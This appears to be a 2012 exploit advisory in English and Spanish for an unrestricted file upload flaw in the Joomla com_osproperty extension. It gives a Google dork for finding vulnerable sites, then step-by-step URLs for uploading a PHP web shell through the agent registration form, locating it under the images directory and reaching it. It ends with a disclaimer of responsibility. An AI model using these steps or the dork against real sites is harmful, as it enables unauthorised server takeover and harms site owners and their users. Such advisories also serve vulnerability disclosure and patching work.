49 lines
No EOL
1.3 KiB
Text
49 lines
No EOL
1.3 KiB
Text
_______________________________________________________________________________________
|
|
|
|
Exploit Title: Joomla com_osproperty Unrestricted File Upload
|
|
|
|
Google Dork: com_osproperty
|
|
|
|
Date: [13-07-2012]
|
|
|
|
Author: Daniel Barragan "D4NB4R"
|
|
|
|
Twitter: @D4NB4R
|
|
|
|
site: http://www.insecurityperu.org/ & http://poisonsecurity.wordpress.com/
|
|
|
|
Vendor: Ossolution Team http://extensions.joomla.org/
|
|
|
|
Version: 2.0.2 (last update on Jul 12, 2012)
|
|
|
|
License: Commercial $ 28.86us
|
|
|
|
Tested on: [Linux(arch)-Windows(7ultimate)]
|
|
|
|
|
|
1. Go to this route
|
|
Ingrese a esta ruta
|
|
|
|
http://site/component/osproperty/?task=agent_register
|
|
|
|
|
|
2. Complete the form, raising the shell.php instead of your photo
|
|
Complete el formulario, subiendo la shell.php en lugar de su foto
|
|
|
|
|
|
3. Locate your file in the root /osproperty/agent/
|
|
Busque su archivo en la raiz /osproperty/agent/
|
|
|
|
http://site/images/osproperty/agent/randomid_yourshell.php
|
|
|
|
|
|
Help: This path can help you find your web shell in case you need it
|
|
Este path le puede ayudar a encontrar su web shell en caso q lo necesite
|
|
|
|
component/osproperty/?task=agent_default
|
|
|
|
|
|
Im not responsible for which is given
|
|
No me hago responsable del uso que se le de
|
|
_______________________________________________________________________________________
|
|
Daniel Barragan "D4NB4R" 2012 |